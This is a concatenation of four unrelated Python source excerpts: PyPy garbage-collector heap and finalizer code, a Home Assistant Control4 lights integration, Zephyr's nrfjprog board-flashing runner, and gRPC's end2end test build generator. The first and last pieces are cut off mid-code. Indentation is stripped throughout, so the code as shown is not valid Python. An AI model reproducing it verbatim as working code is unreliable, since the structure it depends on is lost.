def ll_trigger():
try:
self.llinterp.eval_graph(graph, [None], recursive=True)
except llinterp.LLException:
raise RuntimeError(
"finalizer_trigger() raised an exception, shouldn't happen")
return ll_trigger
def update_finalizer_handlers(self):
handlers = self.finalizer_handlers
ll_handlers = lltype.malloc(gctypelayout.FIN_HANDLER_ARRAY,
len(handlers), immortal=True)
for i in range(len(handlers)):
fq, deque = handlers[i]
ll_handlers[i].deque = cast_nongc_instance_to_adr(deque)
ll_handlers[i].trigger = llhelper(
lltype.Ptr(gctypelayout.FIN_TRIGGER_FUNC),
self._get_finalizer_trigger(fq))
self.gcdata.finalizer_handlers = llmemory.cast_ptr_to_adr(ll_handlers)
def get_finalizer_queue_index(self, fq_tag):
assert 'FinalizerQueue TAG' in fq_tag.expr
fq = fq_tag.default
try:
index = self.finalizer_queue_indexes[fq]
except KeyError:
index = len(self.finalizer_handlers)
self.finalizer_queue_indexes[fq] = index
deque = self.gc.AddressDeque()
self.finalizer_handlers.append((fq, deque))
self.update_finalizer_handlers()
return index
def gc_fq_next_dead(self, fq_tag):
index = self.get_finalizer_queue_index(fq_tag)
deque = self.finalizer_handlers[index][1]
if deque.non_empty():
obj = deque.popleft()
else:
obj = llmemory.NULL
return llmemory.cast_adr_to_ptr(obj, rclass.OBJECTPTR)
def gc_fq_register(self, fq_tag, ptr):
index = self.get_finalizer_queue_index(fq_tag)
ptr = lltype.cast_opaque_ptr(llmemory.GCREF, ptr)
self.gc.register_finalizer(index, ptr)
# ____________________________________________________________
class LLInterpRootWalker:
_alloc_flavor_ = 'raw'
def __init__(self, gcheap):
self.gcheap = gcheap
def walk_roots(self, collect_stack_root,
collect_static_in_prebuilt_nongc,
collect_static_in_prebuilt_gc,
is_minor=False):
gcheap = self.gcheap
gc = gcheap.gc
if collect_static_in_prebuilt_gc:
for addrofaddr in gcheap.constantroots:
if self.gcheap.gc.points_to_valid_gc_object(addrofaddr):
collect_static_in_prebuilt_gc(gc, addrofaddr)
if collect_static_in_prebuilt_nongc:
for addrofaddr in gcheap.constantrootsnongc:
if self.gcheap.gc.points_to_valid_gc_object(addrofaddr):
collect_static_in_prebuilt_nongc(gc, addrofaddr)
if collect_stack_root:
for addrofaddr in gcheap.llinterp.find_roots(is_minor):
if self.gcheap.gc.points_to_valid_gc_object(addrofaddr):
collect_stack_root(gc, addrofaddr)
def _walk_prebuilt_gc(self, collect): # debugging only! not RPython
for obj in self.gcheap._all_prebuilt_gc:
collect(llmemory.cast_ptr_to_adr(obj._as_ptr()))
def finished_minor_collection(self):
pass
class DirectRunLayoutBuilder(gctypelayout.TypeLayoutBuilder):
def __init__(self, GCClass, lltype2vtable, llinterp):
self.llinterp = llinterp
super(DirectRunLayoutBuilder, self).__init__(GCClass, lltype2vtable)
def make_destructor_funcptr_for_type(self, TYPE):
from rpython.memory.gctransform.support import get_rtti
rtti = get_rtti(TYPE)
if rtti is not None and hasattr(rtti._obj, 'destructor_funcptr'):
destrptr = rtti._obj.destructor_funcptr
DESTR_ARG = lltype.typeOf(destrptr).TO.ARGS[0]
destrgraph = destrptr._obj.graph
else:
return None, False
t = self.llinterp.typer.annotator.translator
is_light = not FinalizerAnalyzer(t).analyze_light_finalizer(destrgraph)
def ll_destructor(addr):
try:
v = llmemory.cast_adr_to_ptr(addr, DESTR_ARG)
self.llinterp.eval_graph(destrgraph, [v], recursive=True)
except llinterp.LLException:
raise RuntimeError(
"a destructor raised an exception, shouldn't happen")
return (llhelper(gctypelayout.GCData.CUSTOM_FUNC_PTR, ll_destructor),
is_light)
def make_custom_trace_funcptr_for_type(self, TYPE):
from rpython.memory.gctransform.support import get_rtti
rtti = get_rtti(TYPE)
if rtti is not None and hasattr(rtti._obj, 'custom_trace_funcptr'):
return rtti._obj.custom_trace_funcptr
else:
return None
def collect_constants(graphs):
constants = {}
def collect_args(args):
for arg in args:
if (isinstance(arg, Constant) and
arg.concretetype is not lltype.Void):
reccollect(constants, arg.value)
for graph in graphs:
for block in graph.iterblocks():
collect_args(block.inputargs)
for op in block.operations:
collect_args(op.args)
for link in graph.iterlinks():
collect_args(link.args)
if hasattr(link, "llexitcase"):
reccollect(constants, link.llexitcase)
return constants
def reccollect(constants, llvalue):
if (isinstance(llvalue, lltype._abstract_ptr)
and llvalue._obj is not None and llvalue._obj not in constants
and not isinstance(llvalue._obj, int)):
TYPE = llvalue._T
constants[llvalue._obj] = True
if isinstance(TYPE, lltype.Struct):
for name in TYPE._names:
reccollect(constants, getattr(llvalue, name))
elif isinstance(TYPE, lltype.Array):
for llitem in llvalue:
reccollect(constants, llitem)
parent, parentindex = lltype.parentlink(llvalue._obj)
if parent is not None:
reccollect(constants, parent._as_ptr())
def prepare_graphs_and_create_gc(llinterp, GCClass, GC_PARAMS={}):
flowgraphs = llinterp.typer.annotator.translator.graphs[:]
llinterp.heap = GCManagedHeap(llinterp, flowgraphs, GCClass, GC_PARAMS)
| |
"""Platform for Control4 Lights."""
from __future__ import annotations
import asyncio
from datetime import timedelta
import logging
from pyControl4.error_handling import C4Exception
from pyControl4.light import C4Light
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_TRANSITION,
SUPPORT_BRIGHTNESS,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_SCAN_INTERVAL
from homeassistant.core import HomeAssistant
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from . import Control4Entity, get_items_of_category
from .const import CONF_DIRECTOR, CONTROL4_ENTITY_TYPE, DOMAIN
from .director_utils import director_update_data
_LOGGER = logging.getLogger(__name__)
CONTROL4_CATEGORY = "lights"
CONTROL4_NON_DIMMER_VAR = "LIGHT_STATE"
CONTROL4_DIMMER_VAR = "LIGHT_LEVEL"
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities
):
"""Set up Control4 lights from a config entry."""
entry_data = hass.data[DOMAIN][entry.entry_id]
scan_interval = entry_data[CONF_SCAN_INTERVAL]
_LOGGER.debug(
"Scan interval = %s",
scan_interval,
)
async def async_update_data_non_dimmer():
"""Fetch data from Control4 director for non-dimmer lights."""
try:
return await director_update_data(hass, entry, CONTROL4_NON_DIMMER_VAR)
except C4Exception as err:
raise UpdateFailed(f"Error communicating with API: {err}") from err
async def async_update_data_dimmer():
"""Fetch data from Control4 director for dimmer lights."""
try:
return await director_update_data(hass, entry, CONTROL4_DIMMER_VAR)
except C4Exception as err:
raise UpdateFailed(f"Error communicating with API: {err}") from err
non_dimmer_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="light",
update_method=async_update_data_non_dimmer,
update_interval=timedelta(seconds=scan_interval),
)
dimmer_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="light",
update_method=async_update_data_dimmer,
update_interval=timedelta(seconds=scan_interval),
)
# Fetch initial data so we have data when entities subscribe
await non_dimmer_coordinator.async_refresh()
await dimmer_coordinator.async_refresh()
items_of_category = await get_items_of_category(hass, entry, CONTROL4_CATEGORY)
entity_list = []
for item in items_of_category:
try:
if item["type"] == CONTROL4_ENTITY_TYPE:
item_name = item["name"]
item_id = item["id"]
item_parent_id = item["parentId"]
item_manufacturer = None
item_device_name = None
item_model = None
for parent_item in items_of_category:
if parent_item["id"] == item_parent_id:
item_manufacturer = parent_item["manufacturer"]
item_device_name = parent_item["name"]
item_model = parent_item["model"]
else:
continue
except KeyError:
_LOGGER.exception(
"Unknown device properties received from Control4: %s",
item,
)
continue
if item_id in dimmer_coordinator.data:
item_is_dimmer = True
item_coordinator = dimmer_coordinator
elif item_id in non_dimmer_coordinator.data:
item_is_dimmer = False
item_coordinator = non_dimmer_coordinator
else:
director = entry_data[CONF_DIRECTOR]
item_variables = await director.getItemVariables(item_id)
_LOGGER.warning(
"Couldn't get light state data for %s, skipping setup. Available variables from Control4: %s",
item_name,
item_variables,
)
continue
entity_list.append(
Control4Light(
entry_data,
item_coordinator,
item_name,
item_id,
item_device_name,
item_manufacturer,
item_model,
item_parent_id,
item_is_dimmer,
)
)
async_add_entities(entity_list, True)
class Control4Light(Control4Entity, LightEntity):
"""Control4 light entity."""
def __init__(
self,
entry_data: dict,
coordinator: DataUpdateCoordinator,
name: str,
idx: int,
device_name: str | None,
device_manufacturer: str | None,
device_model: str | None,
device_id: int,
is_dimmer: bool,
) -> None:
"""Initialize Control4 light entity."""
super().__init__(
entry_data,
coordinator,
name,
idx,
device_name,
device_manufacturer,
device_model,
device_id,
)
self._is_dimmer = is_dimmer
def create_api_object(self):
"""Create a pyControl4 device object.
This exists so the director token used is always the latest one, without needing to re-init the entire entity.
"""
return C4Light(self.entry_data[CONF_DIRECTOR], self._idx)
@property
def is_on(self):
"""Return whether this light is on or off."""
return self.coordinator.data[self._idx]["value"] > 0
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
if self._is_dimmer:
return round(self.coordinator.data[self._idx]["value"] * 2.55)
return None
@property
def supported_features(self) -> int:
"""Flag supported features."""
if self._is_dimmer:
return SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION
return 0
async def async_turn_on(self, **kwargs) -> None:
"""Turn the entity on."""
c4_light = self.create_api_object()
if self._is_dimmer:
if ATTR_TRANSITION in kwargs:
transition_length = kwargs[ATTR_TRANSITION] * 1000
else:
transition_length = 0
if ATTR_BRIGHTNESS in kwargs:
brightness = (kwargs[ATTR_BRIGHTNESS] / 255) * 100
else:
brightness = 100
await c4_light.rampToLevel(brightness, transition_length)
else:
transition_length = 0
await c4_light.setLevel(100)
if transition_length == 0:
transition_length = 1000
delay_time = (transition_length / 1000) + 0.7
_LOGGER.debug("Delaying light update by %s seconds", delay_time)
await asyncio.sleep(delay_time)
await self.coordinator.async_request_refresh()
async def async_turn_off(self, **kwargs) -> None:
"""Turn the entity off."""
c4_light = self.create_api_object()
if self._is_dimmer:
if ATTR_TRANSITION in kwargs:
transition_length = kwargs[ATTR_TRANSITION] * 1000
else:
transition_length = 0
await c4_light.rampToLevel(0, transition_length)
else:
transition_length = 0
await c4_light.setLevel(0)
if transition_length == 0:
transition_length = 1500
delay_time = (transition_length / 1000) + 0.7
_LOGGER.debug("Delaying light update by %s seconds", delay_time)
await asyncio.sleep(delay_time)
await self.coordinator.async_request_refresh()
| |
# Copyright (c) 2017 Linaro Limited.
# Copyright (c) 2019 Nordic Semiconductor ASA.
#
# SPDX-License-Identifier: Apache-2.0
'''Runner for flashing with nrfjprog.'''
from functools import partial
import os
from pathlib import Path
import shlex
import subprocess
import sys
from re import fullmatch, escape
from runners.core import ZephyrBinaryRunner, RunnerCaps, depr_action
try:
from intelhex import IntelHex
except ImportError:
IntelHex = None
# Helper function for inspecting hex files.
# has_region returns True if hex file has any contents in a specific region
# region_filter is a callable that takes an address as argument and
# returns True if that address is in the region in question
def has_region(regions, hex_file):
if IntelHex is None:
raise RuntimeError('one or more Python dependencies were missing; '
"see the getting started guide for details on "
"how to fix")
try:
ih = IntelHex(hex_file)
return any((len(ih[rs:re]) > 0) for (rs, re) in regions)
except FileNotFoundError:
return False
# https://infocenter.nordicsemi.com/index.jsp?topic=%2Fug_nrf_cltools%2FUG%2Fcltools%2Fnrf_nrfjprogexe_return_codes.html&cp=9_1_3_1
UnavailableOperationBecauseProtectionError = 16
class NrfJprogBinaryRunner(ZephyrBinaryRunner):
'''Runner front-end for nrfjprog.'''
def __init__(self, cfg, family, softreset, dev_id, erase=False,
tool_opt=[], force=False, recover=False):
super().__init__(cfg)
self.hex_ = cfg.hex_file
self.family = family
self.softreset = softreset
self.dev_id = dev_id
self.erase = bool(erase)
self.force = force
self.recover = bool(recover)
self.tool_opt = []
for opts in [shlex.split(opt) for opt in tool_opt]:
self.tool_opt += opts
@classmethod
def name(cls):
return 'nrfjprog'
@classmethod
def capabilities(cls):
return RunnerCaps(commands={'flash'}, dev_id=True, erase=True)
@classmethod
def dev_id_help(cls) -> str:
return '''Device identifier. Use it to select the J-Link Serial Number
of the device connected over USB. '*' matches one or more
characters/digits'''
@classmethod
def do_add_parser(cls, parser):
parser.add_argument('--nrf-family',
choices=['NRF51', 'NRF52', 'NRF53', 'NRF91'],
help='''MCU family; still accepted for
compatibility only''')
parser.add_argument('--softreset', required=False,
action='store_true',
help='use reset instead of pinreset')
parser.add_argument('--snr', required=False, dest='dev_id',
action=partial(depr_action,
replacement='-i/--dev-id'),
help='Deprecated: use -i/--dev-id instead')
parser.add_argument('--tool-opt', default=[], action='append',
help='''Additional options for nrfjprog,
e.g. "--recover"''')
parser.add_argument('--force', required=False,
action='store_true',
help='Flash even if the result cannot be guaranteed.')
parser.add_argument('--recover', required=False,
action='store_true',
help='''erase all user available non-volatile
memory and disable read back protection before
flashing (erases flash for both cores on nRF53)''')
@classmethod
def do_create(cls, cfg, args):
return NrfJprogBinaryRunner(cfg, args.nrf_family, args.softreset,
args.dev_id, erase=args.erase,
tool_opt=args.tool_opt, force=args.force,
recover=args.recover)
def ensure_snr(self):
if not self.dev_id or "*" in self.dev_id:
self.dev_id = self.get_board_snr(self.dev_id or "*")
self.dev_id = self.dev_id.lstrip("0")
def get_boards(self):
snrs = self.check_output(['nrfjprog', '--ids'])
snrs = snrs.decode(sys.getdefaultencoding()).strip().splitlines()
if not snrs:
raise RuntimeError('"nrfjprog --ids" did not find a board; '
'is the board connected?')
return snrs
@staticmethod
def verify_snr(snr):
if snr == '0':
raise RuntimeError('"nrfjprog --ids" returned 0; '
'is a debugger already connected?')
def get_board_snr(self, glob):
# Use nrfjprog --ids to discover connected boards.
#
# If there's exactly one board connected, it's safe to assume
# the user wants that one. Otherwise, bail unless there are
# multiple boards and we are connected to a terminal, in which
# case use print() and input() to ask what the user wants.
re_glob = escape(glob).replace(r"\*", ".+")
snrs = [snr for snr in self.get_boards() if fullmatch(re_glob, snr)]
if len(snrs) == 0:
raise RuntimeError(
'There are no boards connected{}.'.format(
f" matching '{glob}'" if glob != "*" else ""))
elif len(snrs) == 1:
board_snr = snrs[0]
self.verify_snr(board_snr)
print("Using board {}".format(board_snr))
return board_snr
elif not sys.stdin.isatty():
raise RuntimeError(
f'refusing to guess which of {len(snrs)} '
'connected boards to use. (Interactive prompts '
'disabled since standard input is not a terminal.) '
'Please specify a serial number on the command line.')
snrs = sorted(snrs)
print('There are multiple boards connected{}.'.format(
f" matching '{glob}'" if glob != "*" else ""))
for i, snr in enumerate(snrs, 1):
print('{}. {}'.format(i, snr))
p = 'Please select one with desired serial number (1-{}): '.format(
len(snrs))
while True:
try:
value = input(p)
except EOFError:
sys.exit(0)
try:
value = int(value)
except ValueError:
continue
if 1 <= value <= len(snrs):
break
return snrs[value - 1]
def ensure_family(self):
# Ensure self.family is set.
if self.family is not None:
return
if self.build_conf.getboolean('CONFIG_SOC_SERIES_NRF51X'):
self.family = 'NRF51'
elif self.build_conf.getboolean('CONFIG_SOC_SERIES_NRF52X'):
self.family = 'NRF52'
elif self.build_conf.getboolean('CONFIG_SOC_SERIES_NRF53X'):
self.family = 'NRF53'
elif self.build_conf.getboolean('CONFIG_SOC_SERIES_NRF91X'):
self.family = 'NRF91'
else:
raise RuntimeError(f'unknown nRF; update {__file__}')
def check_force_uicr(self):
# On SoCs without --sectoranduicrerase, we want to fail by
# default if the application contains UICR data and we're not sure
# that the flash will succeed.
# A map from SoCs which need this check to their UICR address
# ranges. If self.family isn't in here, do nothing.
uicr_ranges = {
'NRF53': ((0x00FF8000, 0x00FF8800),
(0x01FF8000, 0x01FF8800)),
'NRF91': ((0x00FF8000, 0x00FF8800),),
}
if self.family not in uicr_ranges:
return
uicr = uicr_ranges[self.family]
if not self.uicr_data_ok and has_region(uicr, self.hex_):
# Hex file has UICR contents, and that's not OK.
raise RuntimeError(
'The hex file contains data placed in the UICR, which '
'needs a full erase before reprogramming. Run west '
'flash again with --force, --erase, or --recover.')
@property
def uicr_data_ok(self):
# True if it's OK to try to flash even with UICR data
# in the image; False otherwise.
return self.force or self.erase or self.recover
def recover_target(self):
if self.family == 'NRF53':
self.logger.info(
'Recovering and erasing flash memory for both the network '
'and application cores.')
else:
self.logger.info('Recovering and erasing all flash memory.')
if self.family == 'NRF53':
self.check_call(['nrfjprog', '--recover', '-f', self.family,
'--coprocessor', 'CP_NETWORK',
'--snr', self.dev_id])
self.check_call(['nrfjprog', '--recover', '-f', self.family,
'--snr', self.dev_id])
def program_hex(self):
# Get the nrfjprog command use to actually program self.hex_.
self.logger.info('Flashing file: {}'.format(self.hex_))
# What type of erase argument should we pass to nrfjprog?
if self.erase:
erase_arg = '--chiperase'
else:
if self.family == 'NRF52':
erase_arg = '--sectoranduicrerase'
else:
erase_arg = '--sectorerase'
# What nrfjprog commands do we need to flash this target?
program_commands = []
if self.family == 'NRF53':
# nRF53 requires special treatment due to the extra coprocessor.
self.program_hex_nrf53(erase_arg, program_commands)
else:
# It's important for tool_opt to come last, so it can override
# any options that we set here.
program_commands.append(['nrfjprog', '--program', self.hex_,
erase_arg, '--verify',
'-f', self.family,
'--snr', self.dev_id] +
self.tool_opt)
try:
for command in program_commands:
self.check_call(command)
except subprocess.CalledProcessError as cpe:
if cpe.returncode == UnavailableOperationBecauseProtectionError:
if self.family == 'NRF53':
family_help = (
' Note: your target is an nRF53; all flash memory '
'for both the network and application cores will be '
'erased prior to reflashing.')
else:
family_help = (
' Note: this will recover and erase all flash memory '
'prior to reflashing.')
self.logger.error(
'Flashing failed because the target '
'must be recovered.\n'
' To fix, run "west flash --recover" instead.\n' +
family_help)
raise
def program_hex_nrf53(self, erase_arg, program_commands):
# program_hex() helper for nRF53.
# *********************** NOTE *******************************
# self.hex_ can contain code for both the application core and
# the network core.
#
# We can't assume, for example, that
# CONFIG_SOC_NRF5340_CPUAPP=y means self.hex_ only contains
# data for the app core's flash: the user can put arbitrary
# addresses into one of the files in HEX_FILES_TO_MERGE.
#
# Therefore, on this family, we may need to generate two new
# hex files, one for each core, and flash them individually
# with the correct '--coprocessor' arguments.
#
# Kind of hacky, but it works, and nrfjprog is not capable of
# flashing to both cores at once. If self.hex_ only affects
# one core's flash, then we skip the extra work to save time.
# ************************************************************
def add_program_cmd(hex_file, coprocessor):
program_commands.append(
['nrfjprog', '--program', hex_file, erase_arg,
'--verify', '-f', 'NRF53', '--snr', self.dev_id,
'--coprocessor', coprocessor] + self.tool_opt)
full_hex = IntelHex()
full_hex.loadfile(self.hex_, format='hex')
min_addr, max_addr = full_hex.minaddr(), full_hex.maxaddr()
# Base address of network coprocessor's flash. From nRF5340
# OPS. We should get this from DTS instead if multiple values
# are possible, but this is fine for now.
net_base = 0x01000000
if min_addr < net_base <= max_addr:
net_hex, app_hex = IntelHex(), IntelHex()
for start, stop in full_hex.segments():
segment_hex = net_hex if start >= net_base else app_hex
segment_hex.merge(full_hex[start:stop])
hex_path = Path(self.hex_)
hex_dir, hex_name = hex_path.parent, hex_path.name
net_hex_file = os.fspath(hex_dir / f'GENERATED_CP_NETWORK_{hex_name}')
app_hex_file = os.fspath(
hex_dir / f'GENERATED_CP_APPLICATION_{hex_name}')
self.logger.info(
f'{self.hex_} targets both nRF53 coprocessors; '
f'splitting it into: {net_hex_file} and {app_hex_file}')
net_hex.write_hex_file(net_hex_file)
app_hex.write_hex_file(app_hex_file)
add_program_cmd(net_hex_file, 'CP_NETWORK')
add_program_cmd(app_hex_file, 'CP_APPLICATION')
else:
coprocessor = 'CP_NETWORK' if max_addr >= net_base else 'CP_APPLICATION'
add_program_cmd(self.hex_, coprocessor)
def reset_target(self):
if self.family == 'NRF52' and not self.softreset:
self.check_call(['nrfjprog', '--pinresetenable', '-f', self.family,
'--snr', self.dev_id]) # Enable pin reset
if self.softreset:
self.check_call(['nrfjprog', '--reset', '-f', self.family,
'--snr', self.dev_id])
else:
self.check_call(['nrfjprog', '--pinreset', '-f', self.family,
'--snr', self.dev_id])
def do_run(self, command, **kwargs):
self.require('nrfjprog')
self.ensure_output('hex')
self.ensure_snr()
self.ensure_family()
self.check_force_uicr()
if self.recover:
self.recover_target()
self.program_hex()
self.reset_target()
self.logger.info(f'Board with serial number {self.dev_id} '
'flashed successfully.')
| |
#!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates the appropriate build.json data for all the end2end tests."""
import yaml
import collections
import hashlib
FixtureOptions = collections.namedtuple(
'FixtureOptions',
'fullstack includes_proxy dns_resolver name_resolution secure platforms ci_mac tracing exclude_configs exclude_iomgrs large_writes enables_compression supports_compression is_inproc is_http2 supports_proxy_auth supports_write_buffering')
default_unsecure_fixture_options = FixtureOptions(
True, False, True, True, False, ['windows', 'linux', 'mac', 'posix'], True, False, [], [], True, False, True, False, True, False, True)
socketpair_unsecure_fixture_options = default_unsecure_fixture_options._replace(fullstack=False, dns_resolver=False)
default_secure_fixture_options = default_unsecure_fixture_options._replace(secure=True)
uds_fixture_options = default_unsecure_fixture_options._replace(dns_resolver=False, platforms=['linux', 'mac', 'posix'], exclude_iomgrs=['uv'])
fd_unsecure_fixture_options = default_unsecure_fixture_options._replace(
dns_resolver=False, fullstack=False, platforms=['linux', 'mac', 'posix'], exclude_iomgrs=['uv'])
inproc_fixture_options = default_unsecure_fixture_options._replace(dns_resolver=False, fullstack=False, name_resolution=False, supports_compression=False, is_inproc=True, is_http2=False, supports_write_buffering=False)
# maps fixture name to whether it requires the security library
END2END_FIXTURES = {
'h2_compress': default_unsecure_fixture_options._replace(enables_compression=True),
'h2_census': default_unsecure_fixture_options,
'h2_load_reporting': default_unsecure_fixture_options,
'h2_fakesec': default_secure_fixture_options._replace(ci_mac=False),
'h2_fd': fd_unsecure_fixture_options,
'h2_full': default_unsecure_fixture_options,
'h2_full+pipe': default_unsecure_fixture_options._replace(
platforms=['linux'], exclude_iomgrs=['uv']),
'h2_full+trace': default_unsecure_fixture_options._replace(tracing=True),
'h2_full+workarounds': default_unsecure_fixture_options,
'h2_http_proxy': default_unsecure_fixture_options._replace(
ci_mac=False, exclude_iomgrs=['uv'], supports_proxy_auth=True),
'h2_oauth2': default_secure_fixture_options._replace(
ci_mac=False, exclude_iomgrs=['uv']),
'h2_proxy': default_unsecure_fixture_options._replace(
includes_proxy=True, ci_mac=False, exclude_iomgrs=['uv']),
'h2_sockpair_1byte': socketpair_unsecure_fixture_options._replace(
ci_mac=False, exclude_configs=['msan'], large_writes=False,
exclude_iomgrs=['uv']),
'h2_sockpair': socketpair_unsecure_fixture_options._replace(
ci_mac=False, exclude_iomgrs=['uv']),
'h2_sockpair+trace': socketpair_unsecure_fixture_options._replace(
ci_mac=False, tracing=True, large_writes=False, exclude_iomgrs=['uv']),
'h2_ssl': default_secure_fixture_options,
'h2_ssl_proxy': default_secure_fixture_options._replace(
includes_proxy=True, ci_mac=False, exclude_iomgrs=['uv']),
'h2_uds': uds_fixture_options,
'inproc': inproc_fixture_options
}
TestOptions = collections.namedtuple(
'TestOptions',
'needs_fullstack needs_dns needs_names proxyable secure traceable cpu_cost exclude_iomgrs large_writes flaky allows_compression needs_compression exclude_inproc needs_http2 needs_proxy_auth needs_write_buffering')
default_test_options = TestOptions(False, False, False, True, False, True, 1.0, [], False, False, True, False, False, False, False, False)
connectivity_test_options = default_test_options._replace(needs_fullstack=True)
LOWCPU = 0.1
# maps test names to options
END2END_TESTS = {
'authority_not_supported': default_test_options,
'bad_hostname': default_test_options._replace(needs_names=True),
'bad_ping': connectivity_test_options._replace(proxyable=False),
'binary_metadata': default_test_options._replace(cpu_cost=LOWCPU),
'resource_quota_server': default_test_options._replace(large_writes=True,
proxyable=False,
allows_compression=False),
'call_creds': default_test_options._replace(secure=True),
'cancel_after_accept': default_test_options._replace(cpu_cost=LOWCPU),
'cancel_after_client_done': default_test_options._replace(cpu_cost=LOWCPU),
'cancel_after_invoke': default_test_options._replace(cpu_cost=LOWCPU),
'cancel_after_round_trip': default_test_options._replace(cpu_cost=LOWCPU),
'cancel_before_invoke': default_test_options._replace(cpu_cost=LOWCPU),
'cancel_in_a_vacuum': default_test_options._replace(cpu_cost=LOWCPU),
'cancel_with_status': default_test_options._replace(cpu_cost=LOWCPU),
'compressed_payload': default_test_options._replace(proxyable=False,needs_compression=True),
'connectivity': connectivity_test_options._replace(needs_names=True,
proxyable=False, cpu_cost=LOWCPU, exclude_iomgrs=['uv']),
'default_host': default_test_options._replace(needs_fullstack=True,
needs_dns=True,needs_names=True),
'disappearing_server': connectivity_test_options._replace(flaky=True,needs_names=True),
'empty_batch': default_test_options._replace(cpu_cost=LOWCPU),
'filter_causes_close': default_test_options._replace(cpu_cost=LOWCPU),
'filter_call_init_fails': default_test_options,
'filter_latency': default_test_options._replace(cpu_cost=LOWCPU),
'graceful_server_shutdown': default_test_options._replace(cpu_cost=LOWCPU,exclude_inproc=True),
'hpack_size': default_test_options._replace(proxyable=False,
traceable=False,
cpu_cost=LOWCPU),
'high_initial_seqno': default_test_options._replace(cpu_cost=LOWCPU),
'idempotent_request': default_test_options,
'invoke_large_request': default_test_options,
'keepalive_timeout': default_test_options._replace(proxyable=False,
cpu_cost=LOWCPU,
needs_http2=True),
'large_metadata': default_test_options,
'max_concurrent_streams': default_test_options._replace(
proxyable=False, cpu_cost=LOWCPU, exclude_inproc=True),
'max_connection_age': default_test_options._replace(cpu_cost=LOWCPU,
exclude_inproc=True),
'max_connection_idle': connectivity_test_options._replace(
proxyable=False, exclude_iomgrs=['uv'], cpu_cost=LOWCPU),
'max_message_length': default_test_options._replace(cpu_cost=LOWCPU),
'negative_deadline': default_test_options,
'network_status_change': default_test_options._replace(cpu_cost=LOWCPU),
'no_logging': default_test_options._replace(traceable=False),
'no_op': default_test_options,
'payload': default_test_options,
'load_reporting_hook': default_test_options,
'ping_pong_streaming': default_test_options._replace(cpu_cost=LOWCPU),
'ping': connectivity_test_options._replace(proxyable=False, cpu_cost=LOWCPU),
'proxy_auth': default_test_options._replace(needs_proxy_auth=True),
'registered_call': default_test_options,
'request_with_flags': default_test_options._replace(
proxyable=False, cpu_cost=LOWCPU),
'request_with_payload': default_test_options._replace(cpu_cost=LOWCPU),
'server_finishes_request': default_test_options._replace(cpu_cost=LOWCPU),
'shutdown_finishes_calls': default_test_options._replace(cpu_cost=LOWCPU),
'shutdown_finishes_tags': default_test_options._replace(cpu_cost=LOWCPU),
'simple_cacheable_request': default_test_options._replace(cpu_cost=LOWCPU),
'stream_compression_compressed_payload': default_test_options._replace(proxyable=False,
exclude_inproc=True),
'stream_compression_payload': default_test_options._replace(exclude_inproc=True),
'stream_compression_ping_pong_streaming': default_test_options._replace(exclude_inproc=True),
'simple_delayed_request': connectivity_test_options,
'simple_metadata': default_test_options,
'simple_request': default_test_options,
'streaming_error_response': default_test_options._replace(cpu_cost=LOWCPU),
'trailing_metadata': default_test_options,
'workaround_cronet_compression': default_test_options,
'write_buffering': default_test_options._replace(cpu_cost=LOWCPU,
needs_write_buffering=True),
'write_buffering_at_end': default_test_options._replace(cpu_cost=LOWCPU,
needs_write_buffering=True),
}
def compatible(f, t):
if END2END_TESTS[t].needs_fullstack:
if not END2END_FIXTURES[f].fullstack:
return False
if END2END_TESTS[t].needs_dns:
if not END2END_FIXTURES[f].dns_resolver:
return False
if END2END_TESTS[t].needs_names:
if not END2END_FIXTURES[f].name_resolution:
return False
if not END2END_TESTS[t].proxyable:
if END2END_FIXTURES[f].includes_proxy:
return False
if not END2END_TESTS[t].traceable:
if END2END_FIXTURES[f].tracing:
return False
if END2END_TESTS[t].large_writes:
if not END2END_FIXTURES[f].large_writes:
return False
if not END2END_TESTS[t].allows_compression:
if END2END_FIXTURES[f].enables_compression:
return False
if END2END_TESTS[t].needs_compression:
if not END2END_FIXTURES[f].supports_compression:
return False
if END2END_TESTS[t].exclude_inproc:
if END2END_FIXTURES[f].is_inproc:
return False
if END2END_TESTS[t].needs_http2:
if not END2END_FIXTURES[f].is_http2:
return False
if END2END_TESTS[t].needs_proxy_auth:
if not END2END_FIXTURES[f].supports_proxy_auth:
return False
if END2END_TESTS[t].needs_write_buffering:
if not END2END_FIXTURES[f].supports_write_buffering:
return False
return True
def without(l, e):
l = l[:]
l.remove(e)
return l
def main():
sec_deps = [
'grpc_test_util',
'grpc',
'gpr_test_util',
'gpr'
]
unsec_deps = [
'grpc_test_util_unsecure',
'grpc_unsecure',
'gpr_test_util',
'gpr'
]
json = {
'#': 'generated with test/end2end/gen_build_json.py',
'libs': [
{
'name': 'end2end_tests',
'build': 'private',
'language': 'c',
'secure': True,
'src': ['test/core/end2end/end2end_tests.cc',
'test/core/end2end/end2end_test_utils.cc'] + [
'test/core/end2end/tests/%s.cc' % t
for t in sorted(END2END_TESTS.keys())],
'headers': ['test/core/end2end/tests/cancel_test_helpers.h',
'test/core/end2end/end2end_tests.h'],
'deps': sec_deps,
'vs_proj_dir': 'test/end2end/tests',
}
] + [
{
'name': 'end2end_nosec_tests',
'build': 'private',
'language': 'c',
'secure': False,
'src': ['test/core/end2end/end2end_nosec_tests.cc',
'test/core/end2end/end2end_test_utils.cc'] + [
'test/core/end2end/tests/%s.cc' % t
for t in sorted(END2END_TESTS.keys())
if not END2END_TESTS[t].secure],
'headers': ['test/core/end2end/tests/cancel_test_helpers.h',
'test/core/end2end/end2end_tests.h'],
'deps': unsec_deps,
'vs_proj_dir': 'test/end2end/tests',
}
],
'targets': [
{
'name': '%s_test' % f,
'build': 'test',
'language': 'c',
'run': False,
'src': ['test/core/end2end/fixtures/%s.cc' % f],
